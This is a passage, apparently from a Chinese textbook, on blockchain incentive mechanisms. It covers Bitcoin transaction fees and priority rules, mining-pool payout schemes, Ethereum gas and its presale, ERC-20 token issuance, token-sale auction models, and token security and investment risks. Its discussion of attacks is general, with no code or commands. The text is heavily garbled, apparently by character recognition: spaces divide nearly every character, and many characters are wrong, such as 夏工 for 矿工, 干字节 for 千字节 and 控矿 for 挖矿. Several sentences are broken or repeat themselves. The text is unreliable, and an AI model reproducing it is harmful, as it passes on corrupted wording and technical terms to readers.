通过 打包 交易 所 产生 的 激励 ， 是 指 每 一 个 区 块 中 包含 的 所 有 交易 费用 。 交 易手 续费 促使 矿工 尽 可 能 收集 更 多 的 交易 以 提高 激励 。 在 比特 币 的 生成 空间 耗 尽 之 后 ， 交 易 费 将 逐渐 取代 创造 新 块 的 奖励 ， 
成 为 维持 比特 币 经 济 存在 的 最 主要 因素 。 比 特 币 的 交易 手续 费 不 取决 于 交易 金额 的 大 小 ， 而 是 按 用 户 发 出 交易 的 每 干 字 节 数据 量 收取 0.0001BTC 的 价格 。 随 着 比特 币 交 易 需 求 量 的 不 断 提 升 ， 其 有 限 的 交 
易 空 间 是 造成 交易 费用 上 涨 的 主要 原因 。2016 年 4 月 以 来 ， 比 特 币 定价 策略 变 成 了 拍卖 形式 ， 因 为 比特 币 每 个 区 块 所 容纳 的 交易 量 已 经 达到 饱和 ， 用 户 文 付 转 账 需要 和 其 他 用 户 进行 竞价 ， 夏 工会 在 打包 
时 对 于 价 高 者 的 交易 给 予 较 高 的 优先 级 。 竞 价 机 制 使 得 比特 币 的 交易 手续 费 节 节 攀 升 。 


挖 矿 节点 处 理 交 易 按 如 下 规则 进行 排序 。 


1) 处 理 较 高 优先 级 交易 。 区 块 中 用 来 存储 交易 的 前 50KB 是 保留 给 较 高 优先 级 交易 的 ， 不 管 该 交易 中 是 否 包含 挖 矿 手续 费 。 较 高 优先 级 的 确定 是 由 挖 矿 节点 处 理 交 易 记 录 时 为 每 笔 交 易 分 配 的 ， 优 先 
级 通过 币 的 新 旧 程 度 H 、 交 易 字 节 数 、 交 易 中 比 特 币 数 量 来 综合 决定 。 具 体 来 说 ， 对 于 每 一 个 输入 (Inputs) 来 讲 ， 客 户 端 会 先 将 比特 币 的 数量 乘 以 这 些 币 在 块 中 存在 的 时 间 ( 币 龄 ，age) ， 然 后 将 所 有 
的 乘积 加 起 来 ， 除 以 此 次 交易 的 大 小 (以 字 节 为 单位 ) 。 计 算 公 式 : 


priority=sum(input_value_in units*input_age)/size_in_bytes 


计算 结果 如 果 大 于 0.576， 那 么 该 交易 可 称 为 “ 较 高 优先 级 ”， 否 则 必须 支付 交易 手续 费 。 随 着 新 的 区 块 逐 渐 产 生 ， 留 在 内 存 池 未 被 打包 的 剩余 交易 的 块 龄 随 之 变 大 ， 最 终 会 满足 高 优先 级 的 门槛 ， 从 
而 被 打包 进 区 块 。 这 种 机 制 避免 了 零 矿工 费 被 无 限期 延迟 打包 的 可 能 。 


2) 接着 按 矿 工 费 排序 交易 。 挖 矿 节 点 会 选 出 包含 矿工 费 的 交易 ， 并 按照 “每 干 字 节 矿工 费 ” 进 行 排序 ， 优 先 选择 矿工 费 较 高 的 交易 来 填充 剩 下 的 区 块 。 
3) 如 果 区 块 中 仍 有 剩余 空间 ， 挖 矿 节 点 可 以 选择 那些 不 含 矿工 费 的 交易 打包 整合 进 区 块 中 。 


按 上 述 规则 构造 区 块 后 ， 节 点 通过 挖 矿工 作 ， 不 断 重复 进行 尝试 ， 直 到 它 找到 的 随机 调整 数 使 得 产生 的 哈 希 值 低 于 某 个 特定 的 难度 目标 ， 从 而 成 功 构建 新 的 区 块 。 经 过 全 网 每 个 节点 的 独立 校 验 ， 在 
全 网 范围 达成 共识 后 ， 最 终 获 得 控 矿 奖励 和 交易 奖励 。 


交易 手续 费 机 制导 致 矿工 在 处 理 比特 币 交 易 时 对 高 手续 费 的 交易 优先 处 理 ， 信 息 不 对 称 导 致 用 户 无 法 准确 预 估 到 | 底 要 支付 多 少 手续 费 才 能 获得 接 下 来 的 第 一 个 区 块 的 确认 ， 也 无 法 准确 预 估 一 笔 交 易 
确认 的 时 间 。 支 付 服务 的 稀缺 性 导致 用 户 广 播 交 易 时 要 么 超额 支付 ， 要 么 由 于 支付 费用 不 足 而 必须 等 待 很 长 的 确认 时 间 。 显 而 易 见 ， 高 手续 费 降 低 了 比特 币 在 小 额 支 付 、 日 常 支付 和 比特 币 区 块 链 上 应 用 
的 功能 价值 。 


长 期 以 来 ， 大 部 分 的 收益 仍然 来 自 挖 矿 所 得 的 比特 币 奖励 ， 然 而 随 着 比特 币 控 矿 奖励 的 递减 ， 以 及 每 个 区 块 中 包含 的 交易 数量 的 增加 ， 交 易 费 占 矿 工 收入 的 比重 将 会 逐渐 增加 。 在 2140 年 之 后 ， 比 特 
币 发 行 总 量 达到 上 限 后 ， 所 有 矿工 收益 都 将 由 交易 费 构 成 。 


2. 激 励 的 再 分 配 


比特 币 交易 的 合法 性 是 由 整个 网 络 合理 验证 的 ， 只 有 大 多 数 参 与 者 认同 某 笔 交 易 才 视 为 有 效 。 然 而 在 这 种 机 制 下 ， 如 何 避 免 交 易 发 起 方 通过 伪造 多 个 身份 ， 发 起 “女巫 攻击 ”来 对 某 笔 不 合法 交易 进 
行 确认 ， 融 来 “双人 花 ” 问 题 ” 基 于 控制 系统 中 大 部 分 算 力 比 控制 大 部 分 实体 难得 多 的 假设 ， 比 特 币 协议 使 用 PoW 来 防止 “女巫 攻击 ”。 在 确认 交易 前 ， 参 与 者 需要 做 一 些 工作 来 证 明 他 们 的 真实 实体 身 
份 ， 通 过 寻找 随机 数 使 区 块头 哈 希 值 小 于 等 于 某 给 定 的 难度 目标 值 这 项 工作 ， 不 断 地 尝试 不 同 随 机 数 来 寻找 答案 ， 获 得 区 块 的 记 账 权 。 因 此 ， 算 力 成 为 验证 交易 能 力 获胜 的 关键 ,而 不 是 实体 身份 的 数 
量 。 挖 矿 计算 的 算法 是 固定 的 、 简 单 的 ， 并 且 没 有 在 软件 层面 存在 提升 的 空间 ， 那 么 提升 单个 挖 矿 参与 人 效率 则 主要 依赖 于 硬件 的 性 能 提升 。 


随 着 计算 机 性 能 的 飞 速 提升 、 参 与 挖 矿 网 络 节点 的 不 断 扩 张 ， 难 度 值 也 不 断 进 行 调整 ， 从 而 构筑 起 巨大 的 投入 壁 爸 ， 导 致 攻 击 比 特 币 区 块 链 将 会 是 异常 艰难 的 事情 ， 从 而 确保 从 而 比特 币 主 干 区 块 链 
的 安全 性 ， 构 建 出 人 类 目前 最 安全 的 “数据 之 销 ”。 同 时 ， 这 也 决定 了 比特 币 挖 矿 是 一 场 庞 大 而 持久 的 矿 机 算 力 竞赛 。 自 比特 币 诞生 以 来 ， 夏 机 算 力 发 生 了 若干 次 重大 跃迁 。 


矿 池 将 各 节点 贡献 的 算 力 按 比 例 划分 成 不 同 的 股份 (Share) ， 并 遵循 一 定 的 分 配 机制 来 分 配 奖励 。 例 如 ，PPLNS (Pay Per Last N Shares) 机 制 是 根据 其 在 过 去 N 股 股份 中 所 占 比例 来 支付 收益 ， 
具有 一 定 滞后 性 ， 所 有 矿工 根据 自己 贡献 股份 的 数量 来 分 配 区 块 中 的 货币 。PPS (Pay Per Share) 则 直接 依据 各 节点 算 力 在 矿 池 中 的 占 比 ， 根 据 矿 池 每 天 平均 可 获得 的 矿产 ， 为 各 节点 估算 和 支付 一 份 固 
定 的 基本 理论 收益 ， 并 立即 为 每 一 个 Share 支 付 报酬 ， 而 不 必 等 待 区 块 确认 。 该 支出 来 源 于 矿 池 持 有 的 比特 币 资金 ， 会 一 定 程度 上 减少 矿工 的 风险 ,而 将 风险 转嫁 给 矿 池 运 营 者 ， 因 此 采用 此 方式 的 矿 池 将 
会 收取 7% ~ 8% 手 续费 来 弥补 其 为 各 节点 承担 的 收益 不 确定 性 风险 。 矿 工 承担 低 风 险 ， 收 益 也 相应 较 低 。P2Pool 的 挖 矿 节 点 工作 在 类 似 比特 币 区 块 链 的 一 种 Shares 链 上 ， 每 个 节点 工作 的 区 块 ， 都 包括 支 
付 给 前 期 Shares 的 所 有 者 以 及 该 节点 自己 的 比特 币 。 此 种 模式 下 99% 的 奖励 (50BTC+ 交 易 费 用 ) 会 平均 分 给 矿工 ， 另 外 0.5% 会 奖励 给 生成 区 块 的 人 。 


在 普通 矿工 参与 挖 矿 的 过 程 中 ， 普 通 挖 矿 者 除 可 能 面临 账号 丢失 、 黑 客 攻 击 、 钩 鱼网 站 、 木 马 等 诸多 问题 ， 选 择 矿 池 还 需要 考虑 矿 池 的 诚信 度 、 稳 定性 、 收 益 能 力 、 手 续费 等 因素 。 另 外 ， 在 选择 矿 
机 装备 上 ， 也 存在 个 人 投入 与 整体 算 力 涨 跌 的 博 讲 问题 。 按 照 比特 币 算法 的 设计 ， 挖 矿 难度 会 随 硬件 设备 性 能 的 提高 而 加 大 ， 以 保证 公平 性 。 计 算 难 度 增 加 意味 着 回 本 的 周期 越 来 越 长 ， 成 本 会 越 来 越 
高 ， 与 比特 币 共生 的 矿 机 或 将 面临 更 加 起 伏 波 折 的 历程 。 


[1 未 花费 过 的 交易 输出 UTXO 自 被 记录 到 区 块 链 起 所 经 历 的 区 块 数 ， 即 UTXO 深 度 。 


4.1.3 “以太 币 激 励 


以 太 坊 作为 一 个 运行 智能 合约 的 去 中 心 化 区 块 链 应 用 平台 ， 实 现 了 内 置 编 程 语言 的 区 块 链 协议 ， 并 且 支 持 任 何 区 块 链 分 布 式 应 用 在 此 协议 基础 上 运行 ， 允 许 用 户 按照 自己 的 意图 创建 复杂 的 操作 。 以 
太 坊 也 使 用 激励 驱动 的 安全 模式 ， 通 过 挖 矿 来 获得 以 太 币 、 保 护 网 络 和 验证 计算 。 与 比特 币 不 同 的 是 ， 以 太 坊 的 密码 学 货币 一 一 以 太 币 (Ether) 主要 不 是 用 于 支付 ， 而 是 作为 以 太 坊 的 内 置 数字 资产 ,， 支 
付 运 行 各 种 智能 商业 逻辑 程序 所 需 的 交易 费用 ， 以 激励 矿工 和 保护 以 太 坊 恨 性 运转 。 以 太 坊 的 挖 矿 也 不 需要 过 度 依靠 昂贵 的 专业 挖 矿 设 备 积累 挖 矿 算 力 来 运行 ， 而 是 通过 可 负担 的 挖 矿 实 现 以 太 币 的 发 行 
与 支付 所 需 计算 费用 之 间 的 平衡 。 


1. 以 太 坊 的 燃料 激励 


以 太 坊 是 一 个 运行 智能 合约 的 去 中 心 化 平台 ， 提 供 了 以 太 虚 拟 机 (Ethereum Virtual Machine，EVM) 。EVM 是 图 灵 完 备 的 ， 可 以 实现 循环 语句 ;而 在 图 灵 完 备 的 系统 中 ， 为 了 防止 代码 的 指数 级 
激增 、 无 限 循 环 或 遭 DDoS 攻 击 ， 以 太 坊 引入 了 “燃料 ”的 概念 一 一 Gas。 当 EVM 执 行 交易 时 ， 每 条 指令 都 要 消耗 Gas 资 源 。 越 复杂 的 运算 ,消耗 Gas 越 多 。 只 要 给 每 个 程序 设 定 一 个 可 消耗 Gas 的 上 限 ， 
就 可 以 防止 程序 出 现 死 循环 而 无 法 停止 的 情况 。 


Gas 是 以 太 坊 的 成 本 计量 单位 ， 表 示 智 能 合约 中 具体 操作 的 经 济 开销 。Gas 本 身 有 自身 的 价格 gasprice， 与 以 太 币 有 汇率 换算 的 关系 ， 从 而 保证 以 太 坊 基本 计算 成 本 的 稳定 性 ， 不 会 受 以 太 币 市 场 价格 


的 流动 影响 。 以 Gas 为 单位 的 计算 成 本 和 真实 价值 稳定 不 变 ，gasprice 价 格 是 以 另 一 货币 (比如 以 太 币 ) 为 单位 的 Gas 成 本 。 为 了 保持 Gas 的 价值 稳定 ，gasprice 是 浮动 值 ， 如 果 货 币 成 本 波动 ，gasprice 
也 会 变化 以 保持 同样 的 真实 价值 。gasprice 代 表 交 易 发 送 者 愿意 为 单位 Gas 支 付 的 费用 ， 可 以 由 每 个 用 户 自行 设置 ， 并 受 市 场 供求 关系 影响 (由 矿工 和 交易 发 起 者 的 博弈 来 进行 调控 ， 根 据 多 少 用 户 愿意 花 


费 和 多 少 进程 节点 愿意 接受 ， 形 成 一 个 平衡 价格 ) 。 


每 笔 交 易 需 要 支付 的 交易 费用 Fee=gasused*gasprice。gasused 是 所 有 被 执行 的 命令 的 Gas 消 耗 值 总 和 。 同 时 ， 每 笔 交 易 都 被 要 求 包 含 一 个 gaslimit (又 称 作 startgas， 是 指 这 笔 交 易 所 人 允许 的 Gas 最 
大 消耗 量 ， 代 表 每 笔 交 易 最 多 被 允许 使 用 的 计算 步骤 ) 。 如 果 执 行 交 易 的 过 程 中 ，“ 用 完了 燃料 ”， 所 有 的 状态 改变 都 将 恢复 原状 ， 但 是 已 经 支付 的 交易 费用 不 可 收回 。 如 果 执 行 交 易 中 止 时 还 剩余 “ 燃 
料 ”， 那 么 这 些 “ 燃 料 ” 将 被 退还 给 发 送 者 。 交 易 费 用 将 加 至 矿工 账户 ， 作 为 对 执行 代码 的 矿工 的 报酬 。 


矿工 可 以 根据 gasprice， 在 区 块 startgas 范 围 内 ， 有 选择 地 打包 交易 并 收取 费用 。 用 户 所 选择 支付 的 交易 费用 多 少 会 影响 到 该 交易 被 打包 所 需 等 待 的 时 长 。 显 然 ，gasprice 越 高 ， 其 交易 就 会 越 快 被 矿 
工 打包 。 


燃料 激励 机 制 是 确保 以 太 坊 中 复杂 计算 安全 的 关键 机 制 ， 它 给 任何 失控 或 恶意 的 程序 设 定 了 一 个 安全 阀 ， 程 序 中 的 错误 不 会 使 网 络 的 其 他 部 分 出 现 性 能 问题 ， 只 有 发 起 方 会 受到 影响 。 这 可 以 避免 系 
统 遭 受 DDoS 攻 击 ， 因 为 攻击 者 也 需要 支付 交易 费用 。 以 太 坊 通过 燃料 激励 机 制 可 以 鼓励 更 加 高 效 的 合约 代码 、 减 少 不 必 要 的 计算 和 防止 作恶 。 经 济 激 励 机 制 同时 因为 合约 代码 的 执行 要 根据 执行 指令 数 计 
费 ， 所 消耗 的 费用 超过 设 定 上 限时 会 被 取消 ， 从 而 能 避免 合约 代码 逻辑 中 出 现 死 循环 对 矿工 的 影响 。 


2. 以 太 坊 的 矿 前 激励 


为 整合 所 需 资源 ， 使 以 太 坊 这 个 集 开 发 者 、 矿 工 和 其 他 权益 人 的 巨大 网 络 持续 运转 ， 以 太 坊 宣布 了 对 其 基础 货币 单位 一 以 太 币 的 预 售 计划 。 根 据 以 太 坊 发 布 的 文件 显示 ， 莫 集资 金 的 76.5% 将 用 于 
以 太 坊 平 台 和 工具 的 开发 和 拓展 ，13.5% 的 资金 将 用 于 社区 服务 ， 而 剩余 的 10% 资 金 将 会 用 于 支持 加 密 货币 研究 小 组 (CCRC) 的 研究 。 





2014 年 6 月 ， 以 太 坊 基金 会 Stiftung Ethereum 在 瑞士 设立 ， 用 于 管理 预 售 资金 所 带 来 的 法 律 和 财务 上 的 复杂 事务 ， 以 更 好 文 持 以 太 坊 和 去 中 心 化 技术 生态 系统 。 其 中 一 项 重要 任务 就 是 对 以 太 坊 协议 
及 相关 技术 发 展 的 推进 ， 以 及 对 使 用 以 太 坊 技术 和 协议 的 应 用 进行 支持 。 


4.1.4 ”其 他 通 证 激励 


比特 币 是 比特 币 区 块 链 的 原生 Token， 将 而 将 区 块 链 融入 2.0 时 代 的 以 太 坊 平台 ， 更 是 将 底层 通 证 激励 机 制 和 平台 上 去 中 心 化 的 分 布 式 应 用 程序 及 智能 合约 层 的 激励 机 制 结合 成 一 个 复杂 的 通 证 激励 生 
态 体系 。 正 如 以 太 坊 能 够 在 其 区 块 链 上 层 创 建新 的 协议 ， 以 太 坊 也 能 在 区 块 链 上 层 用 智能 合约 创造 新 的 Token ， 这 种 使 用 智能 合约 创造 的 新 的 通 证 称 为 “ 非 原生 通 证 ” ， 这 种 创建 并 定义 了 非 原 生 通 证 的 
合约 称 为 Token 合 约 。 这 些 非 原生 通 证 和 以 太 币 在 整个 生态 系统 中 遵循 一 个 固定 的 安全 标准 ， 人 允许 整个 以 太 坊 生态 系统 中 的 去 中 心 化 应 用 程序 和 智能 合约 彼此 协作 ， 共 同 构成 了 通 证 激励 体系 。 分 析 通 证 
激励 的 内 在 逻辑 ， 首 先 要 从 通 证 的 产生 来 看 。 


1. 通 证 的 创建 


通 证 的 概念 在 产业 内 被 广泛 熟知 和 应 用 ， 与 以 太 坊 及 其 ERC-20 标 准 密 不 可 分 。ERC-20 是 在 2015 年 11 月 推出 的 Token 标 准 ， 它 为 以 太 坊 上 的 通 证 合约 提供 了 特征 与 接口 的 共同 标准 和 一 套 通 用 规则 ， 
人 允许 钱包 、 交 易 和 其 他 智能 合约 以 一 种 常见 的 方式 对 接 各 种 通 证 ， 从 而 以 太 坊 智能 合约 层 非 原生 通 证 与 以 太 坊 生态 系统 兼容 ， 以 太 坊 区 块 链 上 的 智能 合约 和 去 中 心 化 应 用 之 间 可 以 无 颖 交互 。 基 于 这 个 标 
准 ， 任 何人 都 可 以 在 以 太 坊 上 发 行 自 定义 的 Token ， 来 作为 其 特定 的 权益 和 价值 的 代表 (本 质 上 是 一 种 可 以 流动 的 、 加 密 的 数字 权益 证 明 ) 。 


不 同 的 非 原生 通 证 是 由 通 证 合约 创建 的 。 从 本 质 上 来 说 ， 一 个 通 证 合约 是 一 个 包含 了 对 账户 地 址 及 其 余额 的 映射 的 智能 合约 。 合 约 创 建 者 定义 了 合约 的 账户 余额 ， 即 通 证 。 这 种 余额 可 以 用 来 表示 物 
理 对 象 、 另 一 种 货币 的 价值 、 持 有 人 信用 等 任意 元 素 。 当 一 个 通 证 从 一 个 账户 被 转移 到 另 一 个 账户 的 时 候 ， 通 证 合约 会 更 新 两 个 账户 的 余额 。 通 证 总 供给 可 以 通过 通 证 合约 “铸造 ”新 通 证 来 增加 ， 也 可 
以 通过 “销毁 ” 现 有 通 证 来 减少 或 使 其 不 可 用 。 一 个 符合 ERC-20 标 准 的 通 证 合约 ， 最 重要 的 是 定义 合约 地 址 和 可 用 通 证 的 总 供给 ， 另 外 还 包括 名 字 、 标 志 、 小 数位 等 细节 规定 ， 且 人 允许 发 现 用 户 的 余额 ， 
也 人 允许 余额 经 过 验证 从 一 个 账户 转账 到 另 一 个 账户 。 通 过 ERC-20 通 证 合约 所 创建 的 通 证 ， 可 以 立即 兼容 以 太 坊 钱包 ， 很 容易 地 实现 与 以 太 币 的 交易 。 创 建 通 证 合约 其 实 非常 简单 ， 在 公开 的 GitHub 库 中 
可 以 找到 生成 通 证 的 通用 代码 ， 通 过 复制 粘贴 、 输 入 变量 (如 名 称 、 符 号 、 总 量 ) 等 操作 ， 几 分 钟 就 可 以 创造 出 一 种 ERC-20 标 准 的 非 原生 通 证 。 


为 何 需要 创建 出 不 同 的 应 用 通 证 ( 非 原生 通 证 ) ， 而 不 用 以 太 币 作为 分 布 式 应 用 的 价值 流通 载体 呢 ? 这 是 因为 以 太 币 的 价值 写 人 们 对 整体 以 太 坊 网 络 的 需求 有 关 ， 与 以 太 坊 网 络 对 智能 合约 的 执行 能 
力 有 天， 而 与 以 太 坊 上 单独 的 区 块 链 应 用 价值 并 无 直接 关联 。 而 单独 应 用 的 非 原生 通 证 ， 则 直接 取决 于 该 应 用 自身 的 价值 。 唯 有 如 此 ， 才 能 从 真正 意义 上 发 挥 对 特定 应 用 的 激励 作用 。 


2. 通 证 激励 的 分 配 


通 证 有 3 个 基本 要 素 : 首先 ， 通 证 是 一 种 数字 权益 证 明 ， 须 以 数字 形式 存在 ， 代 表 某 种 权益 ; 其 次 ， 通 证 作为 某 种 权益 符号 ， 其 安全 性 和 有 效 性 受 区 块 链 技术 的 保障 ;第 三 ， 具 备 可 流通 和 交易 的 属 
性 ， 在 可 信 的 数字 化 网 络 中 以 一 种 安全 的 方式 进行 流通 。 


ERC-20 标 准 允 许 一 种 新 的 筹资 模式 ， 即 允许 开发 方 以 出 售 非 原 生 通 证 的 方式 ， 来 为 去 中 心 化 项 目 融资 ， 投 资方 只 需 持 有 以 太 币 等 原生 通 证 ， 即 可 实现 投资 活动 。 一 般 情况 下 ， 项 目 方 通过 平台 公布 项 
目的 通 证 合约 地 址 ， 接 受 原生 通 证 ， 并 通过 智能 合约 定义 一 种 可 预测 的 品 换 规则 。 当 投资 者 想 要 购买 这 种 通 证 的 ， 他 们 可 以 把 自己 的 以 太 币 等 原生 通 证 从 钱包 中 转移 到 项 目 方 公布 的 非 原生 通 证 的 合约 地 
址 中 ， 从 而 获得 项 目 通 证 ， 进 而 可 以 在 支持 项 目 通 证 的 加 密 货币 交易 所 中 交易 。 项 目 方 获 得 投资 者 的 投资 ， 可 以 为 各 类 协议 和 基于 区 块 链 的 应 用 融资 ， 从 而 驱动 新 协议 或 新 应 用 项 目的 发 展 。 这 就 是 通 证 
激励 分 配 的 基本 过 程 。 


不 同 项 目 创建 的 合约 通 证 ， 又 可 根据 其 使 用 方式 或 价值 属性 ， 分 为 应 用 凭证 通 证 、 收 益 权证 通 证 、 股 权 凭 证 通 证 等 类 型 。 


` 应 用 凭证 通 证 : 当 用 户 要 使 用 一 个 区 块 链 应 用 时 所 需 花 费 的 通 证 。 在 区 块 链 应 用 中 ， 应 用 凭证 通 证 扮演 的 是 交易 媒介 的 角色 。 用 户 需要 支付 通 证 以 使 用 应 用 平台 、 功 能 或 通道 ， 随 着 平台 和 应 用 的 
推广 、 发 展 ， 作 为 交易 媒介 的 通 证 价值 会 不 断 上 涨 ; 项 目 方 未 向 投资 者 许诺 任何 资金 上 的 收益 ， 而 是 以 实物 、 服 务 或 者 应 用 场景 使 用 权 等 作为 回报 。 通 证 激励 的 核心 价值 在 于 应 用 层 的 使 用 功能 。 


收益 权证 通 证 : 不 具有 实质 性 使 用 功能 ， 代 表 的 是 对 相关 基础 资产 的 未 来 收益 权 。 相 关 的 基础 资产 包括 特定 的 区 块 链 系统 或 项 目 业 务 运营 利润 。 项 目 发 起 方 基于 区 块 链 平台 上 的 智能 合约 及 相关 算 
法 形成 数字 通 证 收入 ， 并 按 投 资 者 的 收益 权证 定期 或 不 定期 给 付 特定 收益 。 


. 股权 凭证 通 证 : 代表 投资 者 对 项 目 享有 相应 比例 的 所 有 权 ， 类 似 于 公司 股份 。 通 证 持 有 者 拥有 构建 权益 通 证 的 区 块 链 应 用 的 股份 ， 会 收 到 该 区 块 链 应 用 的 收益 分 红 ， 还 拥有 对 应 用 事务 的 投票 权 ， 
以 决定 未 来 这 个 应 用 的 发 展 。 


一 个 区 块 链 应 用 不 一 定 使 用 一 种 通 证 ， 也 可 能 兼 有 上 述 多 种 通 证 特性 ， 比 如 应 用 凭证 和 收益 权证 混合 类 。 通 证 持 有 人 一 方面 在 项 目 落地 后 取得 特定 场景 使 用 权 ， 并 进行 交易 结算 支付 ， 另 一 方面 ， 对 
于 项 目 利润 享有 收益 权 ， 包 括 通 证 回报 和 利润 回报 。 区 别 于 传统 金融 市 场 ， 区 块 链 项 目 中 的 合约 通 证 难以 界定 为 纯粹 的 项 目 权 益 ， 持 有 人 享有 通 证 价值 波动 收益 权 ， 并 且 可 用 作 特 定 场景 下 的 交易 结算 工 
具 ， 因 此 具有 多 重 属 性 。 


不 同 于 原生 通 证 以 挖 矿 为 基础 的 产生 模式 ， 非 原生 通 证 的 产生 灵活 多 样 ， 可 以 是 静态 的 ， 也 可 以 根据 筹集 金额 动态 计算 调整 。 模 式 包括 以 下 几 种 。 


1) 限制 最 高 上 限 ， 以 固定 价格 销售 固定 数量 (因此 估 值 也 是 固定 的 ) 的 通 证 。 为 确保 买 入 ， 投 资 者 通常 会 通过 提高 交易 费 亮 担 的 方式 争 相 购买 ， 很 可 能 导致 超额 购买 和 巨额 的 交易 花费 ， 并 存在 通 证 
购买 分 布 的 不 均衡 隐患 ， 人 存在 大 型 矿 池 介入 并 在 所 有 人 之 前 买 进 所 有 通 证 的 风险 。 


2) 不 限制 最 高 上 限 。 随 着 通 证 销售 的 演化 ， 这 种 不 限制 最 高 上 限 的 模式 又 细 分 出 传统 不 限额 模式 、 逆 向 荷兰 式 拍卖 、Vickrey 拍 卖 等 不 同 模式 。 


@@ 传 统 不 限额 模式 : 人 们 把 数字 货币 发 送 到 一 个 地 址 以 换取 一 定数 量 的 应 用 通 证 。 通 党 为 发布 期 设置 一 个 时 间 窗 口 ， 以 及 一 个 线性 下 降 的 数字 货币 与 应 用 通 证 之 间 的 转换 率 ， 时 间 越 久 每 单元 数字 货 
币 可 以 兄 换 的 应 用 通 证 越 少 ， 直 到 窗口 期 结束 。 这 种 模式 下 ， 购 买 者 经 常 在 价格 增长 的 压力 下 提前 购买 ， 并 且 由 于 不 设 上 限 ， 通 证 创造 数量 完全 取决 于 募 得 的 数字 货币 总 量 及 汇率 ， 存 在 应 用 通 证 数量 和 
估 值 的 不 确定 。 


@ 逆 向 荷兰 式 拍 卖 : 创造 的 通 证 总 量 固 定 ， 其 中 一 定 百分比 的 数量 会 在 通 证 友 布 时 分 配 出 去 。 发 布 方 预先 设 定 众 筹 结束 的 条 件 ， 例 如 卖 出 通 证 的 数量 ,或 募集 的 数字 货币 达到 一 定 值 。 参 与 者 预先 将 
数字 货币 发 送 到 通 证 发 布 者 指定 的 地 址 ， 并 设 定 一 个 购买 价格 的 心理 预期 ， 当 通 证 销售 价格 低 于 其 心理 预期 时 ， 可 发 送 交 易 请 求购 入 通 证 。 通 证 销售 过 程 中 ， 通 证 价格 会 逐渐 下 调 ;， 当 发 布 终 止 条 件 达 
到 ， 最 终 区 块 的 通 证 价格 确定 为 通 证 的 最 终 销售 价格 ， 从 而 不 高 于 每 个 参与 者 购买 时 的 承诺 价格 。 参 与 者 购买 时 宣布 他 们 愿意 付 的 最 高 价 ， 但 是 最 终 的 价格 由 最 后 一 个 最 低 的 价格 所 决定 。 这 种 模式 下 ， 
购买 者 出 于 “害怕 错过 ”的 心理 ， 很 容易 “不 理性 ”地 提前 购 入 ， 从 而 导致 筹 得 的 数字 货币 在 时 间 窗 口 早期 内 就 冲 量 到 上 限 。 这 样 一 来 ， 售 出 通 证 数量 占 总 量 比例 极 低 ， 通 证 佑 值 维持 在 了 高 位 ， 而 剩余 
通 证 占 比 极 高 ， 且 由 项 目 团队 持 有 ， 通 证 交易 价格 极 易 受 控 于 该 团队 。 


@Vickrey 担 卖 : 通 证 总 量 固定 ， 把 价格 交 给 卖方 确定 ， 根 据 出 价 次 高 者 完成 交易 。 这 种 方法 的 好 处 是 当 使 用 最 高 叫价 拍卖 时 ， 买 方 为 了 保障 自己 的 利益 ， 往 往 出 价 要 略 低 于 心理 价格 ; 而 使 用 这 种 拍 
卖方 式 时 ， 买 方 往往 可 能 以 心理 价格 或 略 高 于 心理 价格 出 价 。 


4.2 ”激励 层 安 全 分 析 


4.2.1 ” 通 证 激励 模式 的 安全 隐患 


在 技术 层面 ， 通 证 安全 隐患 可 能 存在 于 项 目 应 用 层 、 合 约 层 等 各 个 层面 ， 且 贯穿 通 证 产生 和 流通 的 整个 过 程 。 


1) 项 目 平台 存在 外 部 入 侵 隐患 ， 平 台 方 如 未 采取 足够 的 技术 防护 措施 ， 导 致 外 部 侵入 ， 则 网 站 可 能 被 黑客 利用 来 发 布 虚假 的 电子 钱包 地 址 ， 骗 取 盲目 的 投资 者 ， 比 如 一 些 通 证 激励 钱包 地 址 信息 在 非 
官方 渠道 发 送 。 


2) 在 合约 执行 过 程 中 ， 可 能 出 现 DDoS 攻 击 , 或 客观 原因 造成 网 站 无 法 访问 ， 虚 拟 币 转 出 长 时 间 未 到 指定 地 址 ， 造 成 用 户 虚拟 币 丢 失 的 情况 。 


3) 通 证 合约 也 可 能 存在 代码 漏洞 风险 ， 使 得 攻击 者 利用 代码 漏洞 初始 化 钱包 并 转移 虚拟 货币 。 一 个 典型 的 漏洞 是 合约 接口 存在 访问 权限 定义 漏洞 ， 对 于 访问 者 权限 未 加 严格 限定 ， 这 样 攻击 者 就 有 可 
能 有 权限 调用 到 核心 函数 并 完成 非法 转账 。 


在 经 济 层面 ， 通 证 众 筹 项 目 存 在 投资 风险 隐患 。 


1) 通 证 不 具有 真实 使 用 价值 。 有 些 项 目 只 是 传统 的 互联 网 项 目 ， 披 着 区 块 链 的 外 壳 以 通 证 为 工具 进行 辅助 融资 ， 其 通 证 并 不 具有 实际 作用 ， 也 不 具备 加 密 属性 及 不 可 替代 性 ， 只 是 法 币 或 比特 币 、 以 
太 币 等 通用 加 密 货币 的 总 换 符号 而 已 。 通 证 使 用 价值 越 是 趋 近 于 零 ， 其 涉嫌 炒 币 和 投机 的 嫌疑 就 越 重 。 


2) 项 目 本 身 不 具备 去 中 心 化 属性 ， 业 务 逻 辑 不 具有 实际 应 用 价值 。 一 些 通 证 依托 的 应 用 可 能 并 不 具有 普遍 性 ， 或 应 用 于 非常 小 众 的 领域 ， 甚 至 不 具备 提高 真实 世界 生产 效率 的 能 力 。 许 多 项 目 昌 然 具 
备 概 念 创新 ， 但 缺乏 从 0 到 1 的 冷 启 动能 力 ， 无 法 完成 落地 转化 。 有 些 通 证 由 团队 一 次 性 发 出 ， 甚 至 没有 挖 矿 机制 ， 并 依赖 于 高 度 中心 化 的 记 账 体系 ， 这 类 项 目 具 有 非常 明显 的 泡沫 属性 ， 人 存在 较 大 的 投资 
隐患 。 


3) 项 目 方 存在 过 度 承诺 和 虚假 宣传 的 现象 。 项 目 平台 无 须 通 过 专门 审核 或 登记 ， 没 有 涨停 板 、 没 有 投资 人 准 入 资质 要 求 、 一 夜 之 间 20 ~ 30 倍 的 神话 、“ 民 主 化 ”融资 手段 等 都 是 刺激 普通 散户 纷纷 
进 场 的 原因 ， 客 观 存 在 的 投资 需求 和 投资 人 低 准 入 门槛 联手 造就 了 火热 的 投资 泡沫 。 有 些 项 目 方 一 味 强 调 项 目 潜力 ， 弱 化 项 目 可 行 性 ， 甚 至 省 略 实 际 落 地 的 方案 和 计划 ， 商 业 模 式 不 清晰 。 有 的 干脆 通过 
